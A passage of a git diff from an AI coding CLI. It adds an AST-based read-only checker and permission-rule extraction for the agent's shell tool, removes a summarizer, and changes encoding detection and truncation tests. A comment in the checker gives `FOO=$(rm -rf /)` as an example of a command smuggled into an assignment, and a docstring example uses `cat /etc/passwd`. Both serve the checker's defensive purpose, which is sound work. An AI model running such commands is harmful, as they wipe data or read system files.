      // Evaluate the body statement
      const body = node.namedChildren[0];
      return body ? evaluateStatementReadOnly(body) : true;
    }

    case 'variable_assignment':
    case 'variable_assignments':
      // Pure assignments only set variables – unless the value runs a
      // command (`FOO=$(rm -rf /)`).
      return !containsCommandSubstitutionAST(node);

    case 'negated_command': {
      const inner = node.namedChildren[0];
      return inner ? evaluateStatementReadOnly(inner) : true;
    }

    case 'function_definition':
      // Function definitions are not read-only operations per se
      return false;

    case 'if_statement':
    case 'while_statement':
    case 'for_statement':
    case 'case_statement':
    case 'c_style_for_statement':
      // Control flow constructs – conservatively non-read-only
      return false;

    case 'declaration_command':
      // export/declare/local/readonly/typeset – can modify env
      return false;

    default:
      // Unknown node types – conservatively non-read-only
      return false;
  }
}

// ---------------------------------------------------------------------------
// Public API: isShellCommandReadOnlyAST
// ---------------------------------------------------------------------------

/**
 * AST-based check whether a shell command is read-only.
 *
 * Replaces the regex-based `isShellCommandReadOnly()` from shellReadOnlyChecker.ts.
 * This version uses tree-sitter-bash for accurate parsing of:
 * - Compound commands (&&, ||, ;, |)
 * - Redirections (>, >>)
 * - Command substitution ($(), ``)
 * - Sub-shells, heredocs, etc.
 *
 * @param command - The shell command string to evaluate.
 * @returns `true` if the command only performs read-only operations.
+ */ +export async function isShellCommandReadOnlyAST( + command: string, +): Promise { + if (typeof command !== 'string' || !command.trim()) return false; + + const tree = await parseShellCommand(command); + const root = tree.rootNode; + + // Empty program + if (root.namedChildCount === 0) return false; + + // Evaluate every top-level statement + for (const stmt of root.namedChildren) { + if (!evaluateStatementReadOnly(stmt)) { + tree.delete(); + return false; + } + } + + tree.delete(); + return true; +} + +// --------------------------------------------------------------------------- +// Public API: extractCommandRules +// --------------------------------------------------------------------------- + +/** + * Extract a simple command's root + subcommand from a `command` AST node. + * + * Returns a rule string following the minimum-scope principle: + * - root + known subcommand + `*` if there are remaining args + * - root + `*` if no known subcommand but has args + * - root only if the command has no args at all + */ +function extractRuleFromCommand(commandNode: SyntaxNode): string | null { + const rootName = getCommandName(commandNode); + if (!rootName) return null; + + const argNodes = getArgumentNodes(commandNode); + const argTexts = argNodes.map((n) => n.text); + + // Skip leading flags to find potential subcommand + let idx = 0; + while (idx < argTexts.length && argTexts[idx]!.startsWith('-')) { + idx++; + } + + const knownSubs = KNOWN_SUBCOMMANDS[rootName]; + let rule = rootName; + + if (knownSubs && knownSubs.size > 0 && idx < argTexts.length) { + const potentialSub = argTexts[idx]!.toLowerCase(); + if (knownSubs.has(potentialSub)) { + rule = `${rootName} ${argTexts[idx]!}`; + + // Docker multi-level: docker compose + if ( + rootName === 'docker' && + potentialSub === 'compose' && + idx + 1 < argTexts.length + ) { + const composeSub = argTexts[idx + 1]!.toLowerCase(); + if (DOCKER_COMPOSE_SUBCOMMANDS.has(composeSub)) { + rule = `${rootName} compose 
${argTexts[idx + 1]!}`; + // Remaining args after compose sub + if (idx + 2 < argTexts.length) { + rule += ' *'; + } + return rule; + } + } + + // Remaining args after subcommand + if (idx + 1 < argTexts.length) { + rule += ' *'; + } + return rule; + } + } + + // No known subcommand – if there are any args, append * + if (argTexts.length > 0) { + rule += ' *'; + } + + return rule; +} + +/** + * Recursively extract rules from a statement node. + * Handles pipeline, list, redirected_statement, etc. + */ +function extractRulesFromStatement(node: SyntaxNode): string[] { + switch (node.type) { + case 'command': + return [extractRuleFromCommand(node)].filter(Boolean) as string[]; + + case 'pipeline': + case 'list': + case 'compound_statement': + case 'subshell': { + const rules: string[] = []; + for (const child of node.namedChildren) { + rules.push(...extractRulesFromStatement(child)); + } + return rules; + } + + case 'redirected_statement': { + const body = node.namedChildren[0]; + return body ? extractRulesFromStatement(body) : []; + } + + case 'negated_command': { + const inner = node.namedChildren[0]; + return inner ? extractRulesFromStatement(inner) : []; + } + + case 'variable_assignment': + case 'variable_assignments': + // Pure assignments – no rule needed + return []; + + default: + // For complex constructs (if/while/for/case), try to extract from + // named children conservatively + return []; + } +} + +/** + * Extract minimum-scope wildcard permission rules from a shell command. + * + * Rules follow the minimum-scope principle: + * - Preserve root command + sub-command, replace arguments with `*` + * - Compound commands are split → separate rules for each part + * - No arguments → no wildcard suffix + * + * @param command - The full shell command string. + * @returns Deduplicated list of permission rule strings. 
+ * + * @example + * extractCommandRules('git clone https://github.com/foo/bar.git') + * // → ['git clone *'] + * + * extractCommandRules('npm install express') + * // → ['npm install *'] + * + * extractCommandRules('npm outdated') + * // → ['npm outdated'] + * + * extractCommandRules('cat /etc/passwd') + * // → ['cat *'] + * + * extractCommandRules('git clone foo && npm install') + * // → ['git clone *', 'npm install'] + * + * extractCommandRules('ls -la /tmp') + * // → ['ls *'] + * + * extractCommandRules('docker compose up -d') + * // → ['docker compose up *'] + */ +export async function extractCommandRules(command: string): Promise { + if (typeof command !== 'string' || !command.trim()) return []; + + const tree = await parseShellCommand(command); + const root = tree.rootNode; + const rules: string[] = []; + + for (const stmt of root.namedChildren) { + rules.push(...extractRulesFromStatement(stmt)); + } + + tree.delete(); + + // Deduplicate while preserving order + return [...new Set(rules)]; +} + +// --------------------------------------------------------------------------- +// Reset (for testing) +// --------------------------------------------------------------------------- + +/** + * Reset the parser singleton. Only intended for testing. + * @internal + */ +export function _resetParser(): void { + if (parserInstance) { + parserInstance.delete(); + parserInstance = null; + } + bashLanguage = null; + initPromise = null; +} diff --git a/packages/core/src/utils/shellReadOnlyChecker.ts b/packages/core/src/utils/shellReadOnlyChecker.ts index 6ab08a359..470977313 100644 --- a/packages/core/src/utils/shellReadOnlyChecker.ts +++ b/packages/core/src/utils/shellReadOnlyChecker.ts @@ -4,6 +4,12 @@ * SPDX-License-Identifier: Apache-2.0 */ +/** + * @deprecated Use `isShellCommandReadOnlyAST` from `./shellAstParser.js` instead. + * This module uses regex + shell-quote for command parsing and has known edge-case + * limitations. 
The AST-based replacement provides accurate parsing via tree-sitter-bash. + */ + import { parse } from 'shell-quote'; import { detectCommandSubstitution, @@ -336,6 +342,11 @@ function evaluateShellSegment(segment: string): boolean { return true; } +/** + * @deprecated Use `isShellCommandReadOnlyAST` from `./shellAstParser.js` instead. + * This function uses regex + shell-quote for command parsing with known edge-case + * limitations. The AST-based replacement provides accurate parsing via tree-sitter-bash. + */ export function isShellCommandReadOnly(command: string): boolean { if (typeof command !== 'string' || !command.trim()) { return false; diff --git a/packages/core/src/utils/summarizer.test.ts b/packages/core/src/utils/summarizer.test.ts deleted file mode 100644 index 6098e77b7..000000000 --- a/packages/core/src/utils/summarizer.test.ts +++ /dev/null @@ -1,202 +0,0 @@ -/** - * @license - * Copyright 2025 Google LLC - * SPDX-License-Identifier: Apache-2.0 - */ - -import type { Mock } from 'vitest'; -import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; -import { GeminiClient } from '../core/client.js'; -import { Config } from '../config/config.js'; -import { - summarizeToolOutput, - llmSummarizer, - defaultSummarizer, -} from './summarizer.js'; -import type { ToolResult } from '../tools/tools.js'; - -// Mock GeminiClient and Config constructor -vi.mock('../core/client.js'); -vi.mock('../config/config.js'); - -describe('summarizers', () => { - let mockGeminiClient: GeminiClient; - let MockConfig: Mock; - const abortSignal = new AbortController().signal; - - beforeEach(() => { - MockConfig = vi.mocked(Config); - const mockConfigInstance = new MockConfig( - 'test-api-key', - 'gemini-pro', - false, - '.', - false, - undefined, - false, - undefined, - undefined, - undefined, - ); - - mockGeminiClient = new GeminiClient(mockConfigInstance); - (mockGeminiClient.generateContent as Mock) = vi.fn(); - }); - - afterEach(() => { - vi.clearAllMocks(); - 
}); - - describe('summarizeToolOutput', () => { - it('should return original text if it is shorter than maxLength', async () => { - const shortText = 'This is a short text.'; - const result = await summarizeToolOutput( - shortText, - mockGeminiClient, - abortSignal, - 2000, - ); - expect(result).toBe(shortText); - expect(mockGeminiClient.generateContent).not.toHaveBeenCalled(); - }); - - it('should return original text if it is empty', async () => { - const emptyText = ''; - const result = await summarizeToolOutput( - emptyText, - mockGeminiClient, - abortSignal, - 2000, - ); - expect(result).toBe(emptyText); - expect(mockGeminiClient.generateContent).not.toHaveBeenCalled(); - }); - - it('should call generateContent if text is longer than maxLength', async () => { - const longText = 'This is a very long text.'.repeat(200); - const summary = 'This is a summary.'; - (mockGeminiClient.generateContent as Mock).mockResolvedValue({ - candidates: [{ content: { parts: [{ text: summary }] } }], - }); - - const result = await summarizeToolOutput( - longText, - mockGeminiClient, - abortSignal, - 2000, - ); - - expect(mockGeminiClient.generateContent).toHaveBeenCalledTimes(1); - expect(result).toBe(summary); - }); - - it('should return original text if generateContent throws an error', async () => { - const longText = 'This is a very long text.'.repeat(200); - const error = new Error('API Error'); - (mockGeminiClient.generateContent as Mock).mockRejectedValue(error); - - const result = await summarizeToolOutput( - longText, - mockGeminiClient, - abortSignal, - 2000, - ); - - expect(mockGeminiClient.generateContent).toHaveBeenCalledTimes(1); - expect(result).toBe(longText); - }); - - it('should construct the correct prompt for summarization', async () => { - const longText = 'This is a very long text.'.repeat(200); - const summary = 'This is a summary.'; - (mockGeminiClient.generateContent as Mock).mockResolvedValue({ - candidates: [{ content: { parts: [{ text: summary }] } }], 
- }); - - await summarizeToolOutput(longText, mockGeminiClient, abortSignal, 1000); - - const expectedPrompt = `Summarize the following tool output to be a maximum of 1000 tokens. The summary should be concise and capture the main points of the tool output. - -The summarization should be done based on the content that is provided. Here are the basic rules to follow: -1. If the text is a directory listing or any output that is structural, use the history of the conversation to understand the context. Using this context try to understand what information we need from the tool output and return that as a response. -2. If the text is text content and there is nothing structural that we need, summarize the text. -3. If the text is the output of a shell command, use the history of the conversation to understand the context. Using this context try to understand what information we need from the tool output and return a summarization along with the stack trace of any error within the tags. The stack trace should be complete and not truncated. If there are warnings, you should include them in the summary within tags. - - -Text to summarize: -"${longText}" - -Return the summary string which should first contain an overall summarization of text followed by the full stack trace of errors and warnings in the tool output. 
-`; - const calledWith = (mockGeminiClient.generateContent as Mock).mock - .calls[0]; - const contents = calledWith[0]; - expect(contents[0].parts[0].text).toBe(expectedPrompt); - }); - }); - - describe('llmSummarizer', () => { - it('should summarize tool output using summarizeToolOutput', async () => { - const toolResult: ToolResult = { - llmContent: 'This is a very long text.'.repeat(200), - returnDisplay: '', - }; - const summary = 'This is a summary.'; - (mockGeminiClient.generateContent as Mock).mockResolvedValue({ - candidates: [{ content: { parts: [{ text: summary }] } }], - }); - - const result = await llmSummarizer( - toolResult, - mockGeminiClient, - abortSignal, - ); - - expect(mockGeminiClient.generateContent).toHaveBeenCalledTimes(1); - expect(result).toBe(summary); - }); - - it('should handle different llmContent types', async () => { - const longText = 'This is a very long text.'.repeat(200); - const toolResult: ToolResult = { - llmContent: [{ text: longText }], - returnDisplay: '', - }; - const summary = 'This is a summary.'; - (mockGeminiClient.generateContent as Mock).mockResolvedValue({ - candidates: [{ content: { parts: [{ text: summary }] } }], - }); - - const result = await llmSummarizer( - toolResult, - mockGeminiClient, - abortSignal, - ); - - expect(mockGeminiClient.generateContent).toHaveBeenCalledTimes(1); - const calledWith = (mockGeminiClient.generateContent as Mock).mock - .calls[0]; - const contents = calledWith[0]; - expect(contents[0].parts[0].text).toContain(`"${longText}"`); - expect(result).toBe(summary); - }); - }); - - describe('defaultSummarizer', () => { - it('should stringify the llmContent', async () => { - const toolResult: ToolResult = { - llmContent: { text: 'some data' }, - returnDisplay: '', - }; - - const result = await defaultSummarizer( - toolResult, - mockGeminiClient, - abortSignal, - ); - - expect(result).toBe(JSON.stringify({ text: 'some data' })); - 
expect(mockGeminiClient.generateContent).not.toHaveBeenCalled(); - }); - }); -}); diff --git a/packages/core/src/utils/summarizer.ts b/packages/core/src/utils/summarizer.ts deleted file mode 100644 index 8c2b391ea..000000000 --- a/packages/core/src/utils/summarizer.ts +++ /dev/null @@ -1,99 +0,0 @@ -/** - * @license - * Copyright 2025 Google LLC - * SPDX-License-Identifier: Apache-2.0 - */ - -import type { ToolResult } from '../tools/tools.js'; -import type { - Content, - GenerateContentConfig, - GenerateContentResponse, -} from '@google/genai'; -import type { GeminiClient } from '../core/client.js'; -import { DEFAULT_QWEN_FLASH_MODEL } from '../config/models.js'; -import { getResponseText, partToString } from './partUtils.js'; -import { createDebugLogger } from './debugLogger.js'; - -const debugLogger = createDebugLogger('SUMMARIZER'); - -/** - * A function that summarizes the result of a tool execution. - * - * @param result The result of the tool execution. - * @returns The summary of the result. - */ -export type Summarizer = ( - result: ToolResult, - geminiClient: GeminiClient, - abortSignal: AbortSignal, -) => Promise; - -/** - * The default summarizer for tool results. - * - * @param result The result of the tool execution. - * @param geminiClient The Gemini client to use for summarization. - * @param abortSignal The abort signal to use for summarization. - * @returns The summary of the result. - */ -export const defaultSummarizer: Summarizer = ( - result: ToolResult, - _geminiClient: GeminiClient, - _abortSignal: AbortSignal, -) => Promise.resolve(JSON.stringify(result.llmContent)); - -const SUMMARIZE_TOOL_OUTPUT_PROMPT = `Summarize the following tool output to be a maximum of {maxOutputTokens} tokens. The summary should be concise and capture the main points of the tool output. - -The summarization should be done based on the content that is provided. Here are the basic rules to follow: -1. 
If the text is a directory listing or any output that is structural, use the history of the conversation to understand the context. Using this context try to understand what information we need from the tool output and return that as a response. -2. If the text is text content and there is nothing structural that we need, summarize the text. -3. If the text is the output of a shell command, use the history of the conversation to understand the context. Using this context try to understand what information we need from the tool output and return a summarization along with the stack trace of any error within the tags. The stack trace should be complete and not truncated. If there are warnings, you should include them in the summary within tags. - - -Text to summarize: -"{textToSummarize}" - -Return the summary string which should first contain an overall summarization of text followed by the full stack trace of errors and warnings in the tool output. -`; - -export const llmSummarizer: Summarizer = (result, geminiClient, abortSignal) => - summarizeToolOutput( - partToString(result.llmContent), - geminiClient, - abortSignal, - ); - -export async function summarizeToolOutput( - textToSummarize: string, - geminiClient: GeminiClient, - abortSignal: AbortSignal, - maxOutputTokens: number = 2000, -): Promise { - // There is going to be a slight difference here since we are comparing length of string with maxOutputTokens. - // This is meant to be a ballpark estimation of if we need to summarize the tool output. 
- if (!textToSummarize || textToSummarize.length < maxOutputTokens) { - return textToSummarize; - } - const prompt = SUMMARIZE_TOOL_OUTPUT_PROMPT.replace( - '{maxOutputTokens}', - String(maxOutputTokens), - ).replace('{textToSummarize}', textToSummarize); - - const contents: Content[] = [{ role: 'user', parts: [{ text: prompt }] }]; - const toolOutputSummarizerConfig: GenerateContentConfig = { - maxOutputTokens, - }; - try { - const parsedResponse = (await geminiClient.generateContent( - contents, - toolOutputSummarizerConfig, - abortSignal, - DEFAULT_QWEN_FLASH_MODEL, - )) as unknown as GenerateContentResponse; - return getResponseText(parsedResponse) || textToSummarize; - } catch (error) { - debugLogger.error('Failed to summarize tool output.', error); - return textToSummarize; - } -} diff --git a/packages/core/src/utils/systemEncoding.test.ts b/packages/core/src/utils/systemEncoding.test.ts index 6b6ce693f..9a8bb8887 100644 --- a/packages/core/src/utils/systemEncoding.test.ts +++ b/packages/core/src/utils/systemEncoding.test.ts @@ -54,7 +54,7 @@ describe('Shell Command Processor - Encoding Functions', () => { expect(windowsCodePageToEncoding(65001)).toBe('utf-8'); expect(windowsCodePageToEncoding(1252)).toBe('windows-1252'); expect(windowsCodePageToEncoding(932)).toBe('shift_jis'); - expect(windowsCodePageToEncoding(936)).toBe('gb2312'); + expect(windowsCodePageToEncoding(936)).toBe('gbk'); expect(windowsCodePageToEncoding(949)).toBe('euc-kr'); expect(windowsCodePageToEncoding(950)).toBe('big5'); expect(windowsCodePageToEncoding(1200)).toBe('utf-16le'); @@ -283,6 +283,23 @@ describe('Shell Command Processor - Encoding Functions', () => { mockedOsPlatform.mockReturnValue('linux'); }); + it('should return utf-8 for valid UTF-8 buffers regardless of system encoding', () => { + // System encoding is GBK, but buffer is valid UTF-8 + mockedOsPlatform.mockReturnValue('win32'); + mockedExecSync.mockReturnValue('Active code page: 936'); + + const buffer = 
Buffer.from('Hello 你好', 'utf-8'); + const result = getCachedEncodingForBuffer(buffer); + expect(result).toBe('utf-8'); + }); + + it('should return utf-8 for pure ASCII buffers', () => { + // ASCII is valid UTF-8 — should return utf-8 immediately + const buffer = Buffer.from('hello world'); + const result = getCachedEncodingForBuffer(buffer); + expect(result).toBe('utf-8'); + }); + it('should use cached system encoding on subsequent calls', () => { process.env['LANG'] = 'en_US.UTF-8'; const buffer = Buffer.from('test'); @@ -305,7 +322,8 @@ describe('Shell Command Processor - Encoding Functions', () => { throw new Error('locale command failed'); }); - const buffer = Buffer.from('test'); + // Use bytes that are NOT valid UTF-8 so the UTF-8-first check fails + const buffer = Buffer.from([0x80, 0x81, 0x82]); mockedChardetDetect.mockReturnValue('ISO-8859-1'); const result = getCachedEncodingForBuffer(buffer); @@ -335,8 +353,9 @@ describe('Shell Command Processor - Encoding Functions', () => { throw new Error('locale command failed'); }); - const buffer1 = Buffer.from('test1'); - const buffer2 = Buffer.from('test2'); + // Use bytes that are NOT valid UTF-8 so the UTF-8-first check fails + const buffer1 = Buffer.from([0x80, 0x81]); + const buffer2 = Buffer.from([0x82, 0x83]); mockedChardetDetect .mockReturnValueOnce('ISO-8859-1') @@ -354,7 +373,9 @@ describe('Shell Command Processor - Encoding Functions', () => { mockedOsPlatform.mockReturnValue('win32'); mockedExecSync.mockReturnValue('Active code page: 1252'); - const buffer = Buffer.from('test'); + // Use bytes that are NOT valid UTF-8 so the UTF-8-first check fails + // and we fall through to system encoding detection + const buffer = Buffer.from([0x80, 0x81, 0x82]); const result = getCachedEncodingForBuffer(buffer); expect(result).toBe('windows-1252'); @@ -365,7 +386,6 @@ describe('Shell Command Processor - Encoding Functions', () => { mockedExecSync.mockReturnValue('Active code page: 936'); // GBK const buffer = 
Buffer.from('test'); - // Mock chardet to return UTF-8 mockedChardetDetect.mockReturnValue('UTF-8'); const result = getCachedEncodingForBuffer(buffer); @@ -385,8 +405,9 @@ describe('Shell Command Processor - Encoding Functions', () => { throw new Error('locale command failed'); }); - const buffer1 = Buffer.from('test1'); - const buffer2 = Buffer.from('test2'); + // Use bytes that are NOT valid UTF-8 so the UTF-8-first check fails + const buffer1 = Buffer.from([0x80, 0x81]); + const buffer2 = Buffer.from([0x82, 0x83]); mockedChardetDetect .mockReturnValueOnce('ISO-8859-1') @@ -398,18 +419,16 @@ describe('Shell Command Processor - Encoding Functions', () => { const result1 = getCachedEncodingForBuffer(buffer1); const result2 = getCachedEncodingForBuffer(buffer2); - // Should call execSync only once due to caching (null result is cached) - expect(mockedExecSync).toHaveBeenCalledTimes(1); + // System encoding is only checked as fallback after UTF-8 and chardet + // both fail. Since chardet returns results here, execSync may not be called. 
expect(result1).toBe('iso-8859-1'); expect(result2).toBe('utf-16'); - // Call a third time to verify cache is still used - const buffer3 = Buffer.from('test3'); + // Call a third time to verify chardet is called each time (not cached) + const buffer3 = Buffer.from([0x84, 0x85]); mockedChardetDetect.mockReturnValueOnce('UTF-32'); const result3 = getCachedEncodingForBuffer(buffer3); - // Still should be only one call to execSync - expect(mockedExecSync).toHaveBeenCalledTimes(1); expect(result3).toBe('utf-32'); }); }); diff --git a/packages/core/src/utils/systemEncoding.ts b/packages/core/src/utils/systemEncoding.ts index 4bce69f4c..1af4831f1 100644 --- a/packages/core/src/utils/systemEncoding.ts +++ b/packages/core/src/utils/systemEncoding.ts @@ -4,6 +4,7 @@ * SPDX-License-Identifier: Apache-2.0 */ +import { isUtf8 } from 'node:buffer'; import { execSync } from 'node:child_process'; import os from 'node:os'; import { detect as chardetDetect } from 'chardet'; @@ -23,34 +24,39 @@ export function resetEncodingCache(): void { } /** - * Returns the system encoding, caching the result to avoid repeated system calls. - * If system encoding detection fails, falls back to detecting from the provided buffer. - * Note: Only the system encoding is cached - buffer-based detection runs for each buffer - * since different buffers may have different encodings. - * @param buffer A buffer to use for detecting encoding if system detection fails. + * Detects the encoding of a buffer. + * + * Strategy: try UTF-8 first, then chardet, then system encoding. + * UTF-8 is tried first because modern developer tools, PowerShell Core, + * git, node, and most CLI tools output UTF-8. Legacy codepage bytes + * (0x80-0xFF) rarely form valid multi-byte UTF-8 sequences by accident. + * + * This function should be called on the **complete** output buffer + * (after the command finishes), not on individual streaming chunks, + * to avoid misdetection when early chunks are ASCII-only. 
+ * + * @param buffer A buffer to analyze for encoding detection. */ export function getCachedEncodingForBuffer(buffer: Buffer): string { - // Cache system encoding detection since it's system-wide + if (isUtf8(buffer)) { + return 'utf-8'; + } + + // Buffer is not valid UTF-8 — try chardet, then system encoding + const detected = detectEncodingFromBuffer(buffer); + if (detected) { + return detected; + } + if (cachedSystemEncoding === undefined) { cachedSystemEncoding = getSystemEncoding(); } - - // If we have a cached system encoding, use it if (cachedSystemEncoding) { - // If the system encoding is not UTF-8 (e.g. Windows CP936), but the buffer - // is detected as UTF-8, prefer UTF-8. This handles tools like 'git' which - // often output UTF-8 regardless of the system code page. - if (cachedSystemEncoding !== 'utf-8') { - const detected = detectEncodingFromBuffer(buffer); - if (detected === 'utf-8') { - return 'utf-8'; - } - } return cachedSystemEncoding; } - // Otherwise, detect from this specific buffer (don't cache this result) - return detectEncodingFromBuffer(buffer) || 'utf-8'; + // Last resort + return 'utf-8'; } /** @@ -123,6 +129,7 @@ export function getSystemEncoding(): string | null { * @param cp The Windows code page number (e.g., 437, 850, etc.) * @returns The corresponding encoding name as a string, or null if no mapping exists. */ + export function windowsCodePageToEncoding(cp: number): string | null { // Most common mappings; extend as needed const map: { [key: number]: string } = { @@ -132,7 +139,7 @@ export function windowsCodePageToEncoding(cp: number): string | null { 866: 'cp866', 874: 'windows-874', 932: 'shift_jis', - 936: 'gb2312', + 936: 'gbk', 949: 'euc-kr', 950: 'big5', 1200: 'utf-16le', @@ -158,13 +165,18 @@ export function windowsCodePageToEncoding(cp: number): string | null { } /** - * Attempts to detect encoding from a buffer using chardet. - * This is useful when system encoding detection fails. 
- * Returns the detected encoding in lowercase, or null if detection fails. + * Attempts to detect the encoding of a non-UTF-8 buffer using chardet + * statistical analysis. Returns null when chardet cannot determine the + * encoding (e.g. the buffer is too small or ambiguous). + * + * Callers that need a guaranteed result should provide their own fallback + * (e.g. {@link getCachedEncodingForBuffer} falls back to the system codepage). + * * @param buffer The buffer to analyze for encoding. * @return The detected encoding as a lowercase string, or null if detection fails. */ export function detectEncodingFromBuffer(buffer: Buffer): string | null { + // Try chardet statistical detection first — works well for larger files try { const detected = chardetDetect(buffer); if (detected && typeof detected === 'string') { diff --git a/packages/core/src/utils/terminalSerializer.ts b/packages/core/src/utils/terminalSerializer.ts index 7bcd2a4ce..e12fe25aa 100644 --- a/packages/core/src/utils/terminalSerializer.ts +++ b/packages/core/src/utils/terminalSerializer.ts @@ -131,17 +131,26 @@ class Cell { } } -export function serializeTerminalToObject(terminal: Terminal): AnsiOutput { +export function serializeTerminalToObject( + terminal: Terminal, + scrollOffset: number = 0, +): AnsiOutput { const buffer = terminal.buffer.active; - const cursorX = buffer.cursorX; - const cursorY = buffer.cursorY; const defaultFg = ''; const defaultBg = ''; + // Clamp scrollOffset to valid range [0, viewportY] + const clampedOffset = Math.max(0, Math.min(scrollOffset, buffer.viewportY)); + const startRow = buffer.viewportY - clampedOffset; + + // Only show cursor when viewing the live viewport (no scroll) + const cursorX = clampedOffset === 0 ? buffer.cursorX : -1; + const cursorY = clampedOffset === 0 ? 
buffer.cursorY : -1; + const result: AnsiOutput = []; for (let y = 0; y < terminal.rows; y++) { - const line = buffer.getLine(buffer.viewportY + y); + const line = buffer.getLine(startRow + y); const currentLine: AnsiLine = []; if (!line) { result.push(currentLine); diff --git a/packages/core/src/utils/truncation.test.ts b/packages/core/src/utils/truncation.test.ts new file mode 100644 index 000000000..4fb4bb99e --- /dev/null +++ b/packages/core/src/utils/truncation.test.ts @@ -0,0 +1,310 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, vi, beforeEach } from 'vitest'; +import { truncateAndSaveToFile } from './truncation.js'; +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; + +vi.mock('node:fs/promises'); + +describe('truncateAndSaveToFile', () => { + const mockWriteFile = vi.mocked(fs.writeFile); + const THRESHOLD = 40_000; + const TRUNCATE_LINES = 1000; + + beforeEach(() => { + vi.clearAllMocks(); + }); + + it('should return content unchanged if below both threshold and line limit', async () => { + const content = 'Short content'; + const fileName = 'test-file'; + const projectTempDir = '/tmp'; + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + expect(result).toEqual({ content }); + expect(mockWriteFile).not.toHaveBeenCalled(); + }); + + it('should truncate when line limit exceeded even if under character threshold', async () => { + // 2000 short lines, well under the 40,000 char threshold + const lines = Array(2000).fill('short'); + const content = lines.join('\n'); // ~12,000 chars, under THRESHOLD + const fileName = 'test-file'; + const projectTempDir = '/tmp'; + + expect(content.length).toBeLessThan(THRESHOLD); + + mockWriteFile.mockResolvedValue(undefined); + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, 
+ ); + + expect(result.outputFile).toBe( + path.join(projectTempDir, `${fileName}.output`), + ); + + const head = Math.floor(TRUNCATE_LINES / 5); + const beginning = lines.slice(0, head); + const end = lines.slice(-(TRUNCATE_LINES - head)); + const expectedTruncated = + beginning.join('\n') + + '\n\n---\n... [CONTENT TRUNCATED] ...\n---\n\n' + + end.join('\n'); + + expect(result.content).toContain( + 'Tool output was too large and has been truncated', + ); + expect(result.content).toContain(expectedTruncated); + }); + + it('should reduce effective lines when line content would exceed character threshold', async () => { + // 2000 lines of 100 chars each = 200,000 chars, well over THRESHOLD (40,000) + // Even after truncating to TRUNCATE_LINES (1000), that's 100,000 chars — still over. + // The effective line count should be reduced to fit within the threshold. + const lines = Array(2000).fill('x'.repeat(100)); + const content = lines.join('\n'); + const fileName = 'test-file'; + const projectTempDir = '/tmp'; + + mockWriteFile.mockResolvedValue(undefined); + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + expect(result.outputFile).toBeDefined(); + expect(result.content).toContain('... [CONTENT TRUNCATED] ...'); + + // Extract just the truncated part (after the instructions) + const truncatedPart = result.content.split( + 'Truncated part of the output:\n', + )[1]; + // The truncated content (excluding the instructions header) should + // be roughly within the character threshold. + expect(truncatedPart.length).toBeLessThan(THRESHOLD * 1.5); + + // With 100 chars/line and 40,000 threshold, effective lines ≈ 400. + // Verify we have fewer lines than the default TRUNCATE_LINES. 
+ const truncatedLines = truncatedPart.split('\n'); + expect(truncatedLines.length).toBeLessThan(TRUNCATE_LINES); + }); + + it('should truncate content by lines when line limit is the binding constraint', async () => { + // 2000 lines of 5 chars each = ~12,000 chars, well under THRESHOLD (40,000) + // so the line limit (1000) is the binding constraint, not the char threshold. + const lines = Array(2000).fill('hello'); + const content = lines.join('\n'); + const fileName = 'test-file'; + const projectTempDir = '/tmp'; + + expect(content.length).toBeLessThan(THRESHOLD); + + mockWriteFile.mockResolvedValue(undefined); + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + expect(result.outputFile).toBe( + path.join(projectTempDir, `${fileName}.output`), + ); + expect(mockWriteFile).toHaveBeenCalledWith( + path.join(projectTempDir, `${fileName}.output`), + content, + ); + + // Effective lines = min(1000, 40000/5) = 1000 (line limit is binding) + const head = Math.floor(TRUNCATE_LINES / 5); + const beginning = lines.slice(0, head); + const end = lines.slice(-(TRUNCATE_LINES - head)); + const expectedTruncated = + beginning.join('\n') + + '\n\n---\n... 
[CONTENT TRUNCATED] ...\n---\n\n' + + end.join('\n'); + + expect(result.content).toContain( + 'Tool output was too large and has been truncated', + ); + expect(result.content).toContain('Truncated part of the output:'); + expect(result.content).toContain(expectedTruncated); + }); + + it('should truncate content with few but very long lines', async () => { + const content = 'a'.repeat(200_000); // A single very long line + const fileName = 'test-file'; + const projectTempDir = '/tmp'; + + mockWriteFile.mockResolvedValue(undefined); + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + expect(result.outputFile).toBe( + path.join(projectTempDir, `${fileName}.output`), + ); + // Full original content is saved to file (no wrapping) + expect(mockWriteFile).toHaveBeenCalledWith( + path.join(projectTempDir, `${fileName}.output`), + content, + ); + + expect(result.content).toContain( + 'Tool output was too large and has been truncated', + ); + expect(result.content).toContain('... [CONTENT TRUNCATED] ...'); + + // The truncated content should stay near the character threshold + const truncatedPart = result.content.split( + 'Truncated part of the output:\n', + )[1]; + expect(truncatedPart.length).toBeLessThan(THRESHOLD * 1.5); + }); + + it('should stay near char threshold even when line lengths vary widely', async () => { + // Mix of short and very long lines — the old average-based approach + // would undercount because long lines in the tail blow past the budget. + const lines: string[] = []; + for (let i = 0; i < 2000; i++) { + lines.push(i % 10 === 0 ? 'x'.repeat(5000) : 'short'); + } + const content = lines.join('\n'); + const fileName = 'test-file'; + const projectTempDir = '/tmp'; + + mockWriteFile.mockResolvedValue(undefined); + + const result = await truncateAndSaveToFile( + content, + fileName, + projectTempDir, + THRESHOLD, + TRUNCATE_LINES, + ); + + expect(result.content).toContain('... 
